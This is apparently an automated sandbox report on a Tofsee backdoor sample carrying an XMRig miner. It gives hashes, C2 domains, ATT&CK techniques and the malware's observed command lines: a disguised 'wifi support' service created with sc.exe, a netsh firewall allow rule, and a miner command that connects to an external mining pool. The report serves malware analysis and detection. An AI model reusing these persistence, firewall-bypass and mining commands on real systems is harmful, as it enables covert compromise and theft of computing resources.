Analysis

  • max time kernel
    168s
  • max time network
    168s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 00:54

General

  • Target

    d5296dd7e388103ee0c57f8f56aa40f870a027046ef229c05780fa02cb40a8be.exe

  • Size

    270KB

  • MD5

    d65fa3775e61633210fa5956d0d5e83f

  • SHA1

    0bc6e9526131276785a9a0d25acbc1ebfc4ab11a

  • SHA256

    d5296dd7e388103ee0c57f8f56aa40f870a027046ef229c05780fa02cb40a8be

  • SHA512

    4a7f26ef3b1538f1ac639468b3314b30e6594ae8e231854dbb897d40bd2c5ed14f8c56286b2ffaec54c92dc9be3992d6e7a00918a259c005b1e1d6592fd4e7b9

Malware Config

Extracted

Family

tofsee

C2

patmushta.info

ovicrush.cn

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d5296dd7e388103ee0c57f8f56aa40f870a027046ef229c05780fa02cb40a8be.exe
    "C:\Users\Admin\AppData\Local\Temp\d5296dd7e388103ee0c57f8f56aa40f870a027046ef229c05780fa02cb40a8be.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2700
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\alozmpkx\
      2⤵
        PID:2440
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wnnolcyu.exe" C:\Windows\SysWOW64\alozmpkx\
        2⤵
          PID:2180
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create alozmpkx binPath= "C:\Windows\SysWOW64\alozmpkx\wnnolcyu.exe /d\"C:\Users\Admin\AppData\Local\Temp\d5296dd7e388103ee0c57f8f56aa40f870a027046ef229c05780fa02cb40a8be.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:8
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description alozmpkx "wifi internet conection"
            2⤵
              PID:3596
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start alozmpkx
              2⤵
                PID:1352
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:4016
              • C:\Windows\SysWOW64\alozmpkx\wnnolcyu.exe
                C:\Windows\SysWOW64\alozmpkx\wnnolcyu.exe /d"C:\Users\Admin\AppData\Local\Temp\d5296dd7e388103ee0c57f8f56aa40f870a027046ef229c05780fa02cb40a8be.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:3084
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Deletes itself
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:2408
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2356

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Persistence

              New Service

              1
              T1050

              Modify Existing Service

              1
              T1031

              Registry Run Keys / Startup Folder

              1
              T1060

              Privilege Escalation

              New Service

              1
              T1050

              Defense Evasion

              Disabling Security Tools

              1
              T1089

              Modify Registry

              2
              T1112

              Discovery

              System Information Discovery

              1
              T1082

              Command and Control

              Web Service

              1
              T1102

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\wnnolcyu.exe
                MD5

                fcb6a6020e0298a7709953406791a244

                SHA1

                bfccb19d3b92e6f1437d35973a08ff3cb6cc7a7d

                SHA256

                acf6ec5e68938022f8baef5a2f21a95d1a1342f2e0e371d7e5e1158bb30ba899

                SHA512

                390e36a8eace32dcc54ef34d6f85cad6846b3812fae451219bca28a6075bfde9924a04434ad509e3ca1d532b6864d990045b1db4fe34f3368aaeaa203e832cd4

              • C:\Windows\SysWOW64\alozmpkx\wnnolcyu.exe
                MD5

                fcb6a6020e0298a7709953406791a244

                SHA1

                bfccb19d3b92e6f1437d35973a08ff3cb6cc7a7d

                SHA256

                acf6ec5e68938022f8baef5a2f21a95d1a1342f2e0e371d7e5e1158bb30ba899

                SHA512

                390e36a8eace32dcc54ef34d6f85cad6846b3812fae451219bca28a6075bfde9924a04434ad509e3ca1d532b6864d990045b1db4fe34f3368aaeaa203e832cd4

              • memory/2356-128-0x0000000000680000-0x0000000000771000-memory.dmp
                Filesize

                964KB

              • memory/2356-132-0x0000000000680000-0x0000000000771000-memory.dmp
                Filesize

                964KB

              • memory/2408-123-0x0000000000AB0000-0x0000000000AC5000-memory.dmp
                Filesize

                84KB

              • memory/2408-126-0x0000000000AB0000-0x0000000000AC5000-memory.dmp
                Filesize

                84KB

              • memory/2700-117-0x00000000001D0000-0x00000000001E3000-memory.dmp
                Filesize

                76KB

              • memory/2700-116-0x0000000000030000-0x000000000003D000-memory.dmp
                Filesize

                52KB

              • memory/2700-118-0x0000000000400000-0x000000000044B000-memory.dmp
                Filesize

                300KB

              • memory/3084-121-0x00000000004B0000-0x000000000055E000-memory.dmp
                Filesize

                696KB

              • memory/3084-122-0x0000000000400000-0x000000000044B000-memory.dmp
                Filesize

                300KB